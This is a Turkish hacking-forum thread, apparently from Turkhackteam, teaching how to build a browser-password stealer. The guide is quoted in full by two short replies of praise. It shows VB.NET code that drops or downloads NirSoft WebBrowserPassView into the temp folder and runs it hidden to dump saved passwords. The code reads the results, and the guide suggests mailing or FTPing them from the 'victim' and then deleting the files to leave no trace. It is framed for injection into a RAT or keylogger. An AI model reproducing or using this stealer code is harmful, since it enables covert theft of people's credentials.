Stealer'lar Üzerine [ Şifre Çalıcı Yapımı, Source, Anlatım ] [ Özgün Konu ]

Maveraün Nehr

Katılımcı Üye
25 Haz 2021
973
1,850
41.303921, -81.901693
İyi günler arkadaşlar bugün sizlerle şifre çalıcılar üzerine konuşacağız. Keylogger veya rat'lar süre gelen ve bir opsiyonlu seçenek olan stealer yani şifre çalıcı kodlamasını öğreneceğiz. Vereceğim kaynak kodları inceleyebilir yazacağınız rat veya keylogger'a enjekte edebilir beğenmezseniz anlatımda geçen yöntemi de deneyebilirsiniz.

İlk olarak eskilerin meşhur şifre araçlarını bulunduran Nirsoft Tools'a gidelim ve gerekli araçları indirelim.


Adresimiz :
Daha sonra açılan pencerede
Password Tools seçeneği karşımıza çıkacak. Ona tıklayalım ve devam edelim.


Pd0nQ.png

Karşımıza çıkan sayfada aşağıda çıkan görselde olduğu gibi "Click this download link." yazan link gömülü butona tıklayalım.

Pd4SH.png

Ben IDM kullandığım için siz kullanmıyorsanız indirme işlemi sırasında size kullanıcı adı ve şifre soracaktır. Kullanıcı adı kısmına download şifre kısmına ise 'nirsoft123!' yazalım ve devam edelim. Dosyalarımız rar şeklinde bilgisayara inecektir. Herhangi bir klasöre çıkaralım.

Pd9Ux.png

Buradan istediğiniz şekilde yani adlarından da görüldüğü üzere Firefox için PasswordFox.exe uygulamasını, Chrome için ChromePass.exe uygulamasını tüm tarayıcılar için ise WebBrowserPassView.exe uygulamasını kullanabilirsiniz. Benim tercihim tek tek uğraşmaktansa hepsini bir seferde almak o yüzden WebBrowserPassView uygulaması üzerinden gideceğim ve stealer'imi bunun üzerinden kodlayacağım. İsterseniz siz tek tek de enjekte edebilirsiniz. Bunun için argüman olayını kullanacağım ve bunu ister .bat üzerinden istersek de cmd üzerinden yapabiliriz. Argüman çalıştırma kodumuz yukarıdaki programlar içerisinde şöyle bir veri tablosu;

/stext dosyaadı.txtParola listesini normal bir metin dosyasına kaydedin.
/stab dosyaadı.txtParola listesini sekmeyle ayrılmış bir metin dosyasına kaydedin.
/scomma dosyaadı.txtParola listesini virgülle ayrılmış bir metin dosyasına kaydedin.
/stabular dosyaadı.txtParola listesini bir tablo metin dosyasına kaydedin.
/shtml dosyaadı.htmlŞifre listesini HTML dosyasına kaydedin (Yatay).
/sverhtml dosyaadı.htmlŞifre listesini HTML dosyasına kaydedin (Dikey).
/sxml dosyaadı.xmlParola listesini XML dosyasına kaydedin.
/skeepass dosyaadıŞifre listesini KeePass csv dosyasına kaydedin.
/spassexp dosyaadıParola listesini Password Exporter Firefox uzantısının XML dosyasına kaydedin.
--

Örnek kullanım cmd üzerinden;
WebBrowserPassView.exe /stext sifreler.txt

Örnek kullanım bat üzerinden;
start WebBrowserPassView.exe /stext sifreler.txt

Şimdi bunu programımız üzerine enjekte edelim ve teoriler üretelim. Ben vb.net üzerine deneyeceğim sizler hangi dil kullanıyorsanız ona göre uyarlayabilirsiniz. Mesela C# kolayca çevrilebilir.

Resource işlemi üzerinden yapılırsa;

Tool'ümüzü yazacağımız keylogger veya rat'ımıza resource ettik ve bunu ister mail'e istersek FTP yoluyla kurbandan çekelim. Çekerken çıkan tool'ü ve metin belgemizi işlem sonrası iz kalmaması için silelim. Bir textbox oluşturalım ve multiline özelliğini aktifleştirelim, ScrollBars özelliğini Both yapalım. Kodu girelim...


Kod:
Function calici() As String
        Dim open As String
        Dim Ressource1() As Byte = My.Resources.WebBrowserPassView
        FileOpen(1, Environ("tmp") & "\WebBrowserPassView.exe", OpenMode.Binary)
        FilePut(1, Ressource1)
        FileClose(1)
        Shell(Environ("tmp") & "\WebBrowserPassView /stext " & Environ("tmp") & "\data.txt", AppWinStyle.Hide)
        open = IO.File.ReadAllText(Environ("tmp") & "\data.txt")
        Return open
    End Function

Load olayına ekleyelim;

Kod:
Call calici()

Artık şifrelerimizi textbox'a çekmemiz gerekli onun için aşağıdaki kodu girelim;

Kod:
TextBox1.Text = IO.File.ReadAllText(Environ("tmp") & "\data.txt")

İşlemlerimiz bu kadar artık şifrelerimiz textbox içerisinde. Maile bağlayıp kendinize göndertebilirsiniz. İşlem sonrasında silme kodunu kullanmayı unutmayın.

Kod:
My.Computer.FileSystem.DeleteFile(Environ("tmp") & "\data.txt")
My.Computer.FileSystem.DeleteFile(Environ("tmp") & "\WebBrowserPassView.exe")

Resource İşlemini Bilmeyen Arkadaşlar İçin Ufak Bir Kullanım Rehberi;



Resource Kullanmadan Uzaktan İndirme İşlemi İle Yaptıralım;

Herhangi bir dosya yükleme sitesine yükleyelim ben dosyaupload.com sitesini tercih ettim(FTP kullanmanız önerilir). İlk önce tool'ümüzü upload edelim ve işlem bittikten sonra(IDM kullanıyorsanız daha iyi olur.) indir diyelim karşımıza çıkan indirme seçeneğinin üzerinde dosyanın gömülü olduğu adres yer alacaktır bunu kopyalayalım ve indirme kodumuza yapıştıralım. GIF'te görüldüğü üzere;


Untitled-Project1544bdbadc05d779.gif

Şimdi dosya indirme kodunu kullanarak tool'ümüzü harekete geçirelim ve şifrelerimizi forma gönderelim.

İndirme Kodum;


Kod:
My.Computer.Network.DownloadFile("https://dl2.lim1.dosyaupload.com/1q82s/WebBrowserPassView.exe?download_token=3ba207a7468c0a082825736ea0c50a0ce2c878e35291451fe1e2e5d77c546be4", Environ("tmp") & "WebBrowserPassView.exe")

Şifre Çekme Kodum;

Kod:
Shell(Environ("tmp") & "\WebBrowserPassView /stext " & Environ("tmp") & "\data.txt", AppWinStyle.Hide)

Textbox özelliğimiz yukarıdaki bahsettiklerimle aynıdır. Yine işlem sonunda mailimize göndertebiliriz şifreleri beraberinde çevre temizliği yapalım yukarıdaki silme kodunu uygulatalım.
Daha önce kodlanmış olan hazır kaynak kodları altta yorum olarak belirteceğim fazla mesaj yazarsam konuyu bölmek zorunda kalıyor sistem böyle yapmayı uygun gördüm. Yorumlarınız önemlidir. Teşekkürler.


- KONU SONU-

İlgisi için değerli yazılım ekibi üyesi sayın `TR0GRES'e teşekkürlerimi sunuyorum.

 

Maveraün Nehr

Katılımcı Üye
25 Haz 2021
973
1,850
41.303921, -81.901693

green.php

Katılımcı Üye
27 Haz 2021
732
874
İyi günler arkadaşlar bugün sizlerle şifre çalıcılar üzerine konuşacağız. Keylogger veya rat'lar süre gelen ve bir opsiyonlu seçenek olan stealer yani şifre çalıcı kodlamasını öğreneceğiz. Vereceğim kaynak kodları inceleyebilir yazacağınız rat veya keylogger'a enjekte edebilir beğenmezseniz anlatımda geçen yöntemi de deneyebilirsiniz.

İlk olarak eskilerin meşhur şifre araçlarını bulunduran Nirsoft Tools'a gidelim ve gerekli araçları indirelim.


Adresimiz :
Daha sonra açılan pencerede
Password Tools seçeneği karşımıza çıkacak. Ona tıklayalım ve devam edelim.


Pd0nQ.png

Karşımıza çıkan sayfada aşağıda çıkan görselde olduğu gibi "Click this download link." yazan link gömülü butona tıklayalım.

Pd4SH.png

Ben IDM kullandığım için siz kullanmıyorsanız indirme işlemi sırasında size kullanıcı adı ve şifre soracaktır. Kullanıcı adı kısmına download şifre kısmına ise 'nirsoft123!' yazalım ve devam edelim. Dosyalarımız rar şeklinde bilgisayara inecektir. Herhangi bir klasöre çıkaralım.

Pd9Ux.png

Buradan istediğiniz şekilde yani adlarından da görüldüğü üzere Firefox için PasswordFox.exe uygulamasını, Chrome için ChromePass.exe uygulamasını tüm tarayıcılar için ise WebBrowserPassView.exe uygulamasını kullanabilirsiniz. Benim tercihim tek tek uğraşmaktansa hepsini bir seferde almak o yüzden WebBrowserPassView uygulaması üzerinden gideceğim ve stealer'imi bunun üzerinden kodlayacağım. İsterseniz siz tek tek de enjekte edebilirsiniz. Bunun için argüman olayını kullanacağım ve bunu ister .bat üzerinden istersek de cmd üzerinden yapabiliriz. Argüman çalıştırma kodumuz yukarıdaki programlar içerisinde şöyle bir veri tablosu;

/stext dosyaadı.txtParola listesini normal bir metin dosyasına kaydedin.
/stab dosyaadı.txtParola listesini sekmeyle ayrılmış bir metin dosyasına kaydedin.
/scomma dosyaadı.txtParola listesini virgülle ayrılmış bir metin dosyasına kaydedin.
/stabular dosyaadı.txtParola listesini bir tablo metin dosyasına kaydedin.
/shtml dosyaadı.htmlŞifre listesini HTML dosyasına kaydedin (Yatay).
/sverhtml dosyaadı.htmlŞifre listesini HTML dosyasına kaydedin (Dikey).
/sxml dosyaadı.xmlParola listesini XML dosyasına kaydedin.
/skeepass dosyaadıŞifre listesini KeePass csv dosyasına kaydedin.
/spassexp dosyaadıParola listesini Password Exporter Firefox uzantısının XML dosyasına kaydedin.
--

Örnek kullanım cmd üzerinden;
WebBrowserPassView.exe /stext sifreler.txt

Örnek kullanım bat üzerinden;
start WebBrowserPassView.exe /stext sifreler.txt

Şimdi bunu programımız üzerine enjekte edelim ve teoriler üretelim. Ben vb.net üzerine deneyeceğim sizler hangi dil kullanıyorsanız ona göre uyarlayabilirsiniz. Mesela C# kolayca çevrilebilir.

Resource işlemi üzerinden yapılırsa;

Tool'ümüzü yazacağımız keylogger veya rat'ımıza resource ettik ve bunu ister mail'e istersek FTP yoluyla kurbandan çekelim. Çekerken çıkan tool'ü ve metin belgemizi işlem sonrası iz kalmaması için silelim. Bir textbox oluşturalım ve multiline özelliğini aktifleştirelim, ScrollBars özelliğini Both yapalım. Kodu girelim...


Kod:
Function calici() As String
        Dim open As String
        Dim Ressource1() As Byte = My.Resources.WebBrowserPassView
        FileOpen(1, Environ("tmp") & "\WebBrowserPassView.exe", OpenMode.Binary)
        FilePut(1, Ressource1)
        FileClose(1)
        Shell(Environ("tmp") & "\WebBrowserPassView /stext " & Environ("tmp") & "\data.txt", AppWinStyle.Hide)
        open = IO.File.ReadAllText(Environ("tmp") & "\data.txt")
        Return open
    End Function

Load olayına ekleyelim;

Kod:
Call calici()

Artık şifrelerimizi textbox'a çekmemiz gerekli onun için aşağıdaki kodu girelim;

Kod:
TextBox1.Text = IO.File.ReadAllText(Environ("tmp") & "\data.txt")

İşlemlerimiz bu kadar artık şifrelerimiz textbox içerisinde. Maile bağlayıp kendinize göndertebilirsiniz. İşlem sonrasında silme kodunu kullanmayı unutmayın.

Kod:
My.Computer.FileSystem.DeleteFile(Environ("tmp") & "\data.txt")
My.Computer.FileSystem.DeleteFile(Environ("tmp") & "\WebBrowserPassView.exe")

Resource İşlemini Bilmeyen Arkadaşlar İçin Ufak Bir Kullanım Rehberi;



Resource Kullanmadan Uzaktan İndirme İşlemi İle Yaptıralım;

Herhangi bir dosya yükleme sitesine yükleyelim ben dosyaupload.com sitesini tercih ettim(FTP kullanmanız önerilir). İlk önce tool'ümüzü upload edelim ve işlem bittikten sonra(IDM kullanıyorsanız daha iyi olur.) indir diyelim karşımıza çıkan indirme seçeneğinin üzerinde dosyanın gömülü olduğu adres yer alacaktır bunu kopyalayalım ve indirme kodumuza yapıştıralım. GIF'te görüldüğü üzere;


Untitled-Project1544bdbadc05d779.gif

Şimdi dosya indirme kodunu kullanarak tool'ümüzü harekete geçirelim ve şifrelerimizi forma gönderelim.

İndirme Kodum;


Kod:
My.Computer.Network.DownloadFile("https://dl2.lim1.dosyaupload.com/1q82s/WebBrowserPassView.exe?download_token=3ba207a7468c0a082825736ea0c50a0ce2c878e35291451fe1e2e5d77c546be4", Environ("tmp") & "WebBrowserPassView.exe")

Şifre Çekme Kodum;

Kod:
Shell(Environ("tmp") & "\WebBrowserPassView /stext " & Environ("tmp") & "\data.txt", AppWinStyle.Hide)

Textbox özelliğimiz yukarıdaki bahsettiklerimle aynıdır. Yine işlem sonunda mailimize göndertebiliriz şifreleri beraberinde çevre temizliği yapalım yukarıdaki silme kodunu uygulatalım.
Daha önce kodlanmış olan hazır kaynak kodları altta yorum olarak belirteceğim fazla mesaj yazarsam konuyu bölmek zorunda kalıyor sistem böyle yapmayı uygun gördüm. Yorumlarınız önemlidir. Teşekkürler.


- KONU SONU-

İlgisi için değerli yazılım ekibi üyesi sayın `TR0GRES'e teşekkürlerimi sunuyorum.

eline sağlık dostum 😉
 
6 Eki 2022
12
4
İyi günler arkadaşlar bugün sizlerle şifre çalıcılar üzerine konuşacağız. Keylogger veya rat'lar süre gelen ve bir opsiyonlu seçenek olan stealer yani şifre çalıcı kodlamasını öğreneceğiz. Vereceğim kaynak kodları inceleyebilir yazacağınız rat veya keylogger'a enjekte edebilir beğenmezseniz anlatımda geçen yöntemi de deneyebilirsiniz.

İlk olarak eskilerin meşhur şifre araçlarını bulunduran Nirsoft Tools'a gidelim ve gerekli araçları indirelim.


Adresimiz :
Daha sonra açılan pencerede
Password Tools seçeneği karşımıza çıkacak. Ona tıklayalım ve devam edelim.


Pd0nQ.png

Karşımıza çıkan sayfada aşağıda çıkan görselde olduğu gibi "Click this download link." yazan link gömülü butona tıklayalım.

Pd4SH.png

Ben IDM kullandığım için siz kullanmıyorsanız indirme işlemi sırasında size kullanıcı adı ve şifre soracaktır. Kullanıcı adı kısmına download şifre kısmına ise 'nirsoft123!' yazalım ve devam edelim. Dosyalarımız rar şeklinde bilgisayara inecektir. Herhangi bir klasöre çıkaralım.

Pd9Ux.png

Buradan istediğiniz şekilde yani adlarından da görüldüğü üzere Firefox için PasswordFox.exe uygulamasını, Chrome için ChromePass.exe uygulamasını tüm tarayıcılar için ise WebBrowserPassView.exe uygulamasını kullanabilirsiniz. Benim tercihim tek tek uğraşmaktansa hepsini bir seferde almak o yüzden WebBrowserPassView uygulaması üzerinden gideceğim ve stealer'imi bunun üzerinden kodlayacağım. İsterseniz siz tek tek de enjekte edebilirsiniz. Bunun için argüman olayını kullanacağım ve bunu ister .bat üzerinden istersek de cmd üzerinden yapabiliriz. Argüman çalıştırma kodumuz yukarıdaki programlar içerisinde şöyle bir veri tablosu;

/stext dosyaadı.txtParola listesini normal bir metin dosyasına kaydedin.
/stab dosyaadı.txtParola listesini sekmeyle ayrılmış bir metin dosyasına kaydedin.
/scomma dosyaadı.txtParola listesini virgülle ayrılmış bir metin dosyasına kaydedin.
/stabular dosyaadı.txtParola listesini bir tablo metin dosyasına kaydedin.
/shtml dosyaadı.htmlŞifre listesini HTML dosyasına kaydedin (Yatay).
/sverhtml dosyaadı.htmlŞifre listesini HTML dosyasına kaydedin (Dikey).
/sxml dosyaadı.xmlParola listesini XML dosyasına kaydedin.
/skeepass dosyaadıŞifre listesini KeePass csv dosyasına kaydedin.
/spassexp dosyaadıParola listesini Password Exporter Firefox uzantısının XML dosyasına kaydedin.
--

Örnek kullanım cmd üzerinden;
WebBrowserPassView.exe /stext sifreler.txt

Örnek kullanım bat üzerinden;
start WebBrowserPassView.exe /stext sifreler.txt

Şimdi bunu programımız üzerine enjekte edelim ve teoriler üretelim. Ben vb.net üzerine deneyeceğim sizler hangi dil kullanıyorsanız ona göre uyarlayabilirsiniz. Mesela C# kolayca çevrilebilir.

Resource işlemi üzerinden yapılırsa;

Tool'ümüzü yazacağımız keylogger veya rat'ımıza resource ettik ve bunu ister mail'e istersek FTP yoluyla kurbandan çekelim. Çekerken çıkan tool'ü ve metin belgemizi işlem sonrası iz kalmaması için silelim. Bir textbox oluşturalım ve multiline özelliğini aktifleştirelim, ScrollBars özelliğini Both yapalım. Kodu girelim...


Kod:
Function calici() As String
        Dim open As String
        Dim Ressource1() As Byte = My.Resources.WebBrowserPassView
        FileOpen(1, Environ("tmp") & "\WebBrowserPassView.exe", OpenMode.Binary)
        FilePut(1, Ressource1)
        FileClose(1)
        Shell(Environ("tmp") & "\WebBrowserPassView /stext " & Environ("tmp") & "\data.txt", AppWinStyle.Hide)
        open = IO.File.ReadAllText(Environ("tmp") & "\data.txt")
        Return open
    End Function

Load olayına ekleyelim;

Kod:
Call calici()

Artık şifrelerimizi textbox'a çekmemiz gerekli onun için aşağıdaki kodu girelim;

Kod:
TextBox1.Text = IO.File.ReadAllText(Environ("tmp") & "\data.txt")

İşlemlerimiz bu kadar artık şifrelerimiz textbox içerisinde. Maile bağlayıp kendinize göndertebilirsiniz. İşlem sonrasında silme kodunu kullanmayı unutmayın.

Kod:
My.Computer.FileSystem.DeleteFile(Environ("tmp") & "\data.txt")
My.Computer.FileSystem.DeleteFile(Environ("tmp") & "\WebBrowserPassView.exe")

Resource İşlemini Bilmeyen Arkadaşlar İçin Ufak Bir Kullanım Rehberi;



Resource Kullanmadan Uzaktan İndirme İşlemi İle Yaptıralım;

Herhangi bir dosya yükleme sitesine yükleyelim ben dosyaupload.com sitesini tercih ettim(FTP kullanmanız önerilir). İlk önce tool'ümüzü upload edelim ve işlem bittikten sonra(IDM kullanıyorsanız daha iyi olur.) indir diyelim karşımıza çıkan indirme seçeneğinin üzerinde dosyanın gömülü olduğu adres yer alacaktır bunu kopyalayalım ve indirme kodumuza yapıştıralım. GIF'te görüldüğü üzere;


Untitled-Project1544bdbadc05d779.gif

Şimdi dosya indirme kodunu kullanarak tool'ümüzü harekete geçirelim ve şifrelerimizi forma gönderelim.

İndirme Kodum;


Kod:
My.Computer.Network.DownloadFile("https://dl2.lim1.dosyaupload.com/1q82s/WebBrowserPassView.exe?download_token=3ba207a7468c0a082825736ea0c50a0ce2c878e35291451fe1e2e5d77c546be4", Environ("tmp") & "WebBrowserPassView.exe")

Şifre Çekme Kodum;

Kod:
Shell(Environ("tmp") & "\WebBrowserPassView /stext " & Environ("tmp") & "\data.txt", AppWinStyle.Hide)

Textbox özelliğimiz yukarıdaki bahsettiklerimle aynıdır. Yine işlem sonunda mailimize göndertebiliriz şifreleri beraberinde çevre temizliği yapalım yukarıdaki silme kodunu uygulatalım.
Daha önce kodlanmış olan hazır kaynak kodları altta yorum olarak belirteceğim fazla mesaj yazarsam konuyu bölmek zorunda kalıyor sistem böyle yapmayı uygun gördüm. Yorumlarınız önemlidir. Teşekkürler.


- KONU SONU-

İlgisi için değerli yazılım ekibi üyesi sayın `TR0GRES'e teşekkürlerimi sunuyorum.

Hocam elinize sağlık resource olmadan da bekliyoruz.
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.